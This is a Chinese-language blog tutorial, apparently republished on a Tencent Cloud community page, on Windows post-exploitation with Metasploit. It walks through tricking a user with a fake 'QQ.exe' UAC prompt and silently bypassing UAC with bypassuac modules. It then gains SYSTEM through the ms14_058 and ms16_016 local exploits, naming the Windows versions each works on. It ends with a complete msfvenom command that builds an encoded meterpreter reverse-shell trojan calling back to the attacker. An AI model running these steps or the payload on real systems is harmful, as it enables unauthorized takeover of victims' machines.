专栏首页字节脉搏实验室后渗透学习二(UAC提权)

后渗透学习二(UAC提权)

文章来自【字节脉搏社区】 作者-purplet

UAC提权

当获得一个低权限的sessions时,这里是管理员权限,想进一步提升权限,可以使用UAC的方法,是因为此时无法通过getsystem直接提权

首先background让当前session后台运行 进入下面这个模块 use Exploit/windows/local/ask set session (此时session对应id) set filename QQ.exe(靶机上将要弹出的uac) exploit 此时在靶机上出现一个exe文件可执行请求提醒,当点击是后,kali上会获得一个session

进入这个session

首先输入sessions查看所有获取到的session,然后进入对应会话session,命令是sessions -i (对应id)

执行getuid发现仍是管理员权限,但是不要担心,再次执行getsystem将获得system权限

但是这样的方式并不好,用户很明显可以看到这样的请求,稍微有些意识的用户都会拒绝点击,因此我们可以尝试bypass uac的方式,不与用户直接交互,而metasploit中就正好提供了这样的模块

MSF模块 exploit/windows/local/bypassuac exploit/windows/local/bypassuac_injection exploit/windows/local/bypassuac_vbs 我们这里就用bypassuac模块

只需设置session即可

set session (session为对应低权限的id)

我们也可以看到这个模块可以对32位和64位的电脑都有效

exploit后我们可以收到一个session,再次执行进入,重复上述提权步骤,将得到system权限(这里不放图了),而靶机那边没有任何反应

至此UACbypass提权成功

附加两个本地提权漏洞

利用本地提权漏洞 search ms14_058 use exploit/windows/local/ms14_058_track_popup_menu 设置session即可 exploit后得到session,这里都不用再执行getsystem的命令,直接得到system权限 可在winxp sp3,win2003 sp2,win7 sp1,win8 32位上执行 search ms16_016 use exploit/windows/local/ms16_016_webdav 设置session即可 exploit后得到session,这里都不用再执行getsystem的命令,直接得到system权限 可在win7 sp1上执行

补充上次遇到的问题:可能是生成的木马有问题

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=攻击机ip LPORT=4444 -f exe > ma.exe

用以上命令生成的木马,不会出现上次报错终止的问题

本文分享自微信公众号 - 字节脉搏实验室(zijiemaiboshiyanshi),作者:purplet

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-01-18

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • ThinkPHP6.0任意文件创建Getshell复现

    ThinkPHP框架是MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。该漏洞源于ThinkPHP...

    字节脉搏实验室
  • 文件上传实战总结

    很多初学者,拿到一个上传点,不知道应该怎么快速的去判断它的绕过方式。这就导致我们大量的时间浪费在了这里,到最后才发现这个地方其实绕不过去或者说自己压根做不出来。

    字节脉搏实验室
  • QQ被盗引发的思考-DNS域名欺骗

    某日下午13:16分,我正躺在床上休息,昨天生病,今天精神才好了点,然而依旧是无精打采,睡也睡不着,便打开了两天没上的QQ,发现寂静了许久的同乡会QQ群里有同学...

    字节脉搏实验室
  • 集群/分布式环境下5种session处理策略

    老七Linux
  • iptsbles系列一

    iptables系列之基础原理 ? linux:网络防火墙 netfilter:frame 框架 网络过滤器 iptables:数据报文过滤,NA...

    若与
  • 8种DOS命令

      它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:...

    周俊辉
  • SAP Cloud for Customer(C4C)和微信集成系列教程

    这个系列主要从技术层面阐述了如何实现end user在微信app里发送的message能够投递到C4C系统,以及在C4C系统基于微信发送过来的message回复...

    Jerry Wang
  • Linux设置开机启动

    1.整理机器上面运行的服务,编些成sh脚本,文件为:/home/rc/exec.sh

    三哥
  • 深度学习GPU环境Ubuntu16.04+GTX1080+CUDA9+cuDNN7+TensorFlow1.6环境配置

    本节详细说明一下深度学习环境配置,Ubuntu 16.04 + Nvidia GTX 1080 + Python 3.6 + CUDA 9.0 + cuDNN ...

    崔庆才
  • macOS: 安装卷宗失败

    如果插上希捷移动硬盘后,mac右上角还是显示“安装卷宗失败”,则进入系统偏好设置 -> 安全性与隐私:

    JNingWei

扫码关注云+社区

领取腾讯云代金券